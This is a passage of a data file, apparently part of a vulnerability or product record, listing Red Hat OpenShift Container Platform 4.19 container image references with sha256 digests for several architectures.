"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:2601add0c23c9e27079274736508adab64c6ae4128f66a53df3f569fe2d9fe3f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:6917cb0e3b073a13ec29e5c329f01cf2ec26e78d47c3c8360d0063d186a4ba53_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:a400d84e7f46869a2c2f75b6f221684879b680910b5e5e4662e074a020483cf4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9-operator@sha256:d94b765497d2fa316fbf4ec374572a5fba96a99b78dfe02b6ed6986e2b7782e6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:26b8049bd1a84ed402fad985ca842bf91ba86fbc5e46f7dea0050120ca551643_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:4c28562416c8308c00af299859adfd3cfb4ef790ef2b6668299dc487c6fa3f45_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:645feaaa568676e0c2b1c620a81a1a60d321800b940d46d2514aa59e1f25e2c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-autoscaler-rhel9@sha256:78bdc6e0ac3da2daf1f39e07c6554ac500deec9670561477f9cf0a346e1145bf_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:59b6c20394bfa15bb36a9ac9b4ef03ae6bdadfcfd110c46fee13ac2abc9f6fa3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:79a30df8b6d7ef52409a3145663550ccf0fbde7e5bffc7e91ccefe2f276e44af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:9324047c73a33a920fe6403604cd123f81dc7663c4780934f4da3b95f0bb5bac_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-baremetal-operator-rhel9@sha256:960007197db71f1b34bdeadf7bc13323cff680b273f795dfcffc569867f695b2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:0685735bcfb4c4a112c1796dcfccf10233e0e62e1538520aa6e02abf8dd88c27_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:12bfb2d2bbc5c7bbf8a161f97c1521d0a5c7ef8ad6e3aca825e62cf066a51109_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:d9a9c57749c9d3e56e51d0b67ac5929949a900b1e6c96a4414366afc1ef4ba3b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-bootstrap-rhel9@sha256:f3650443d49b825783ed4f308ff994be4b24c86dee1e2825274d58e0d4b02a28_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9d90ec3d15ade36e666eee154f9b934259cf811b4a9f987ef18300b78bbe35d3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:9feb86c7f0170dfae9273fe7e3ba662b7333ce8d05ee411b9e7d9c82447b2f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:a1bc835a8621c88b52ddff53d6701b5cefe7cc6f2efb80836c239cb333945043_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-capi-rhel9-operator@sha256:e53bfa8ab4ae569c697bba0b37c25afb495cc6cf324fb4ed50bd8ffc737c04f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:1264333969e9e7825b6ece8ed3a80a3eeac54564ae51d2aed817e4028fbef931_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:aa2f9d5b3b26615c429128234a5dea3cfa7f4f6d5ce3d9d4e6bf6796bafbb50b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:b2115e5268813615088ca48f0138ff6910b07513be4177cd74485d2d41f0e249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-cloud-controller-manager-rhel9-operator@sha256:c8e791718d7e4a68571b873bd0c68aeffc217fe69ee7e74741ecda295fb67dbd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:290f5dcc66373ff79cbcda33e6fbba989c48ae2bf8b623c57e065110e36524db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:572cc6f2f303a9190588696d5bdc80fca9ac3c32d5de9c5d94a27861c871a1c5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:d1561efe3cc68b60fbfc765e028dee3cf4a7666dc499f028c98603075d99a9d7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-api-rhel9@sha256:e04cc25c77ffb05e86a6fea6dc8a6e5c35563612305adbcb98cd0b4832c97ed1_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:96fdf677680bf809356060d0af7fc9166608de5dc4d546e671f3071910558381_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a13951576eb84ab6c6d3b800976320f8bebadad21e49b38faa99e8d1adcc520f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:a8ce501ca7269a42fbb749fd0d3adb03c49468282e1f41e483e569c8acc1f777_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-config-rhel9-operator@sha256:cd0bb571991f485f4f33aadb8434e1d5e3b6c3bf7ac4e1e62994de0b190b6ec6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:0c5df10c40e0bfbed23f193b9aedaf953a5e1e3f4cbbe5f1924866d1ec7f55cf_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:4cdff720094bd0b07e3dd6ae9b5b88756a890fd1ac39361629c44817766fe69e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:b28fe78ee564e859188499e768d57e3e0fe2ad0afb715b0d76ce0c99960f3cd1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-control-plane-machine-set-rhel9-operator@sha256:eb91a50e029bf839ff7be93783acbbd5ea72ba6f3bf9f9dc10c0588c23280f51_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:0ac703dd7441374f349bfeb3639c1a7e364c9764aeb4b9ac05ea7879cce4a5a1_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:4b6155be40a57801b21c44a7b50f89801b15dba8a51dad03969b25bee1a22b6b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:adedcc1ce23f14f3759818cddb9dbbe73dc1f772e3b58e229433f7b6e2f0f5b8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-csi-snapshot-controller-rhel9-operator@sha256:e81081ad64219f09b1eef538df2903264d087d898aa81bebb6634fe4342efc59_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5185785b29d581adb9e8ed4e23ba11c7d67090f4c6e59b0287d2a36c83fd8ae1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:582a1302e53fa201431ccd497816d939ed23590d6d4128cb281a03fcf90f9475_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:5d920d843fb0958a750b86ee532642adc3a77f5e060d54cfa5327e4f41465772_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-dns-rhel9-operator@sha256:cfe7eed06e5855c82c72a26bad2c2354091e94c51b692637cd8e79027ea6742a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:73738cc655778a94527afe3ae48c4ca932590e4f78f03811f70d2d35f5090d3e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:9673f610031257e254dc32e569b3471168e5c18a352ad5bddc9bd51e686eb4e6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:e61ccfe3880e902a0e1cb9e718f62cbf57ce70435092f90f19e441fba2e899d1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-etcd-rhel9-operator@sha256:f66818672229085d1982f4b0053c75d26e6faa4893331f6024b33f953426339d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:1d89f84175f9a72d05074562aeacda38b9047a99974a186a8a4d2d72e20c92f1_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:3e6c6be12aadf59c05c9a2da262846e6a44be09351ad81b8891fefa6a3f93f2c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:cf1445e8c39362b8c0b4b29d56771dcdb15f99c71e922e3fddd6b1f7e7b275bc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-image-registry-rhel9-operator@sha256:d83d30e35ee380e6003d2ee8b5a56a21ea892037b978273d1ff4a8e1ce88c360_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:2ae0fbcbb1b67e11e64b526fae84e06219478f5ea8e474223525cfd4ebd8a39f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:41acc32b9acd74f09fb1e01b77c0fa3c64a891c96cf2549b54b6e0d43411ffb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:669266c0b82317a24e2160b8294fd598a8b24f0053e22358e90eaa5fddb527ff_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-ingress-rhel9-operator@sha256:dd57d49a58a5111f6d067a3a943c9ac9b5a175972312dd83d5fbd224511c0d99_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:4653cd829513c12b1aa11c156b76a06d1d6dfbcd486a9045f5e58d295ce0a616_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:636cac46aae879046a02123b395762387762e921c02421fbeac623feace69c70_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:8df5c2a7eca23f5a88c99db98340446c2c0d2be2ccf22a62753e955a9da54fd5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-apiserver-rhel9-operator@sha256:e0db3311e3862b0fd875d6da134be4cdb3ff6d032591632c35b71aeba2cd6e3d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:30a687482b427b9d447430e0e7ef60e310b9dae5032407b03da36d7795e134c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:42777662e34fa44925901dd1b8aa9537a389c167557b6287e1b01f13675363cb_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:46a134239b3b4a2792fe663a645b0c5d01a48c7db7d9c0fc71dd50c96d2fbbc4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-cluster-api-rhel9-operator@sha256:7b8211056c73804d6072ec729c67cb6e77042e517009b53a0a420efb1a3893dc_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:0c307a3ef1df661bd3a634fd40ea47de440bf061f2f1631a430b61f6426903c9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:9ba38f81d114b4fa4e3523ec46ce02bdcd4b5a122d399968bb7d6f8eb8bba271_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:bf98482d9796579be39293dcb59f424e87eff66f1af285ce773cb61b7eb7c7d7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-controller-manager-rhel9-operator@sha256:fe63945e16c13db6513a214e52c7df6e510806faa3548b5c5658ae4d1c30176b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:48460c041bdffd7940cb9abb2385a6eb9eda698d1155a6e11d948336fb4c81eb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:9c67187eef0b78888e5299143dac7efa69d6c06fa44b9db0a92d4447f7333a0a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:d0fd4fb6c3aada9546a70b24740460db48607ec9333155e04b233b7acf92bde2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-scheduler-rhel9-operator@sha256:eb5cee38879cba152e5979d2ec6db64e2cef6bba8dd82cbd18461aa2af072282_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:047391c0706f4f8c7a8c09598ed4d2900c9154cba66f633dc2df220941e978d6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:3344aa2c937d0e7c24f5f7394a50bba34179fa527f9d7492b951f81fce3ac9c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:9073193ac055f63809d630f43508c41c2fa3bf07d6ca023667fd9fda5daf6117_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-kube-storage-version-migrator-rhel9-operator@sha256:be277357a0ad4546a23c375494eaff76ba1af97f8d77bce6d21ab722d990f749_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:2fc0e9d7cfb095ef01f513ca422a0dbd2b3fa31f8a46b8ed679550d77f3df2fa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4b1651037396367c71bfff638a9a8ef32aac4c570389b4d5d95a992d9eb44876_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:4e46a01af9e94831db7732d4747ffa011a3e634792c2076628ba225bce1baafe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-machine-approver-rhel9@sha256:c5093213a910684e94394a0bb9f931c2b62dce522bf1926e0dbf17220d166d3a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:1fc4a052d1a2f71ad6d2bbf61e0a1037f7e2440debd131eace7d32d0fab11cee_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:54ae01b23db949ca63116514359f1d2bd5a7f7d44b3578fc821d432c4da95e68_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:7bb48785d9f7c7fbbdfea41e890259a9d3bc31fa5676bad18d497aa77da498c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-monitoring-rhel9-operator@sha256:e3c50d3961173a74abdcd965f0ddf63bca5688a0ae2efece117108cbd0dff616_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:accb268a968dd5bc57d1252a01fe3595bc021d13a5f06f56d2e5a117b1d2c1f4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:b508a70e9653143eea20c73de1605c56286a9762ce0090310955e036ea176ca2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:bd5db1b792183d1ca64dd35d5ca0239b2283b61bf1e01b95efa15f6053761b89_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-network-rhel9-operator@sha256:d1395c330a8fae9d244430dcdeb377c9f11e1f52c0e2ea18a3347cbc981e2dbe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:0f5213491694928368f537b0484d07f929f8849470db7ac791ae672dda916aed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:274f0a198e8abfb43cb903534311f3e8a29cf44de59ce1768ea5f252aa9593de_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:575db31ee7397addf620644e731075e091daf9d967fa3e1b5aa916596f9025b6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-node-tuning-rhel9-operator@sha256:acebc3ebf8ae744a19fbf05555531c66f567364b2cacdcde9b3ef57f35cc5bd2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:0df81a471b525e99a5084cd3fdd23a75f9df9f1916944e877c264f35bce94b8f_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:3a37459b3a961cc1b3f3e64198885b19dd30f013b885af167ad52eb82dc1bb5f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:4ca3976b2c2e300c52d742522bbe52e8d351bd689d60e9e8f5c8825ec711520b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-olm-rhel9-operator@sha256:97f61670284c2a539430a564cf572ef2af3ac96ace4c8b9aeb126989c6759abd_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:089ee476ddc1e24bcd421536afea9b800bab93bf4ad5f507109b84b6520b5126_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:5887e28e667ecdf6d9df4bfad8722e18cdf691806f4ee7f2c2e48f14b5d8b3c9_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:b654d350a87e6e4b6a217bfc59909cbc7d1e5a4359d1c7fd18b733dfaa992a48_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-apiserver-rhel9-operator@sha256:cff13d6aed7130ce1277bb14c7cc2320e317aa46b7488c5c25a0df1e1d4074c4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2184859af194b46e0c19c3b0f03194fba334c03bc5696a0fc8e9c6476c12d14d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:2625c625bc24ccaede003e95c02d2da4868434f6c9b73fe836e82602d6e00a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:bce8d9eb7f66cde071409af9074772ea3865a84b1a89bdb30f72d2e0660aa67d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-openshift-controller-manager-rhel9-operator@sha256:c28a0834626b38f25a88ee742e048c395c260065658ae4480f702a21b42cfcf6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:3d5bd790fdd446b6f2b896d61b9a4cf340202d90414453a08c50a5db98c032d9_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:6a104339c2dac844a32bf41939a964686a828c4db71f25b2046fb9a674f9ca2f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:a252f660abcad58c53b292d4c79a597ee78be4073225aa5613e265db5c12b66d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-policy-controller-rhel9@sha256:cb7c3ffaa32b1adfde8526d45e7b05dd3e09597a47e9e01218ecaa70a4f5d444_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:0c0a7de41476c5ebe5774b6cb3534894f3cc995d369299defa385e525da08084_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:221edbcc230c19826adfc6bf31bf9187534ead6f2a9df78356668641510f5114_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:50a91f97f125beab6b358db53c9ba51eb0f4157d4818a30a2e2237f51ca0eeea_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-samples-rhel9-operator@sha256:dd3f1539969b9f3f8d6406afed03d54518123ed5891dbbcc10f205689f2395af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:90ce5019a396232870e95034dddd85f24fa520759c0f25f299c820c13971bb5b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:c2b2b7454a2e108e9c6c1a4b1906a1aa8c468928935aad391d13d3368fe6207c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:e1055a31afcfca83dfc304c7cfdfb4bc00bc6bf3c73e966ff52c19dc36343f07_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-storage-rhel9-operator@sha256:f677c02c340f4c81425fd42cc7f272c9f54cd5c5865dcf300a19c89f1cce04a3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:0d05cfa770dfd10491cb290afaf8498cbe5235a61781fedd7c5284060d9a7e34_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:9bfbb681aa0fa12a4d9f7b3d1fec220d56298316a6c4552738d2ad423a0db452_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c68dd5162089b67cfdf72c82476399701c14ccade5d16ba9a7d549db57376013_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-update-keys-rhel9@sha256:c805d6a4bd3b4252cae2641eb8b3db5be30c72be2bc3a16b4414bc438ab9f82d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:4ceb2e354044e443c6a4f05ccd6b780962ac403f1bf3d8fb424370cf00ef8e9b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:80e754d013536142859f268b98cac5684a857d208946ac9bc13bcb3fc3831cc6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:cd2a286c7f1489c14dbf17e4974dbe9e4e9079f5dd997298666d784d4818e3af_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-cluster-version-rhel9-operator@sha256:e233699c5d3110c15ec314d79f5e21704af94d251600deac0eb601327fba7e37_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:0c31b9504442d00332e3124223d25fb444a293b7af1ec77b12fdc6e2247171f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:324d8f98fd958c228de17a6ad0d88827b042eb651b296d76cb487300caddc254_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:73e87cf74e68425b3407a7bab4fe53a20b11f93408d143e73809867a4dd8b509_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-configmap-reloader-rhel9@sha256:c180d76665303a1c806911447f34c843011c3060ca198a5238ed0f64d9becc74_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:6194a64d8e710070fd29abdd118703c215ff6651c1356186f39ad59d5cc51bcd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:c185f56cb3ae0d3f522cc459da340e3b939bbdd1543258c6a2e7cf87f2045c7b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:e6b13406fbaea6295e5bffbef0b109513d8b22286b992e6ebe9bf23095475b87_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9-operator@sha256:ed6c2f8bfe2a67e986e090d39ecee8713e2fb0f85e87ba89652174c977845d95_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:0d15b65a5b1e662400e81798702500b889e3256644d84ddcbfebb9a70c1a1cf4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2667a7138ce10557824bf4f5337c2cb9d3c4c3aee56f3d303aebcce4d7d79006_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:2c8bfcde38a23b93e8474a20f98c6dd58b6fbd1d5c0773a45cab9e56f8796cc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-console-rhel9@sha256:b391bcc49e93b19233c4a25cace7e2a787232bf2d915939440184752f09a18e9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:0f31780ee3816f6e40944c0429b36eec3de2d2be03e85494498d3df2f2667cc4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:176ac0dff111c759bee1251925874b63b60c5f42fbefae44c6518928abf7f58b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:7b2a691e66dfffb9f0a36d4069db83c068d3792e1b16e426585d164b24b608aa_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-container-networking-plugins-rhel9@sha256:a8407b116617836506303cc1d9c3d8dbeb6a134923a9bb6dfd41435495a48a0b_arm64",
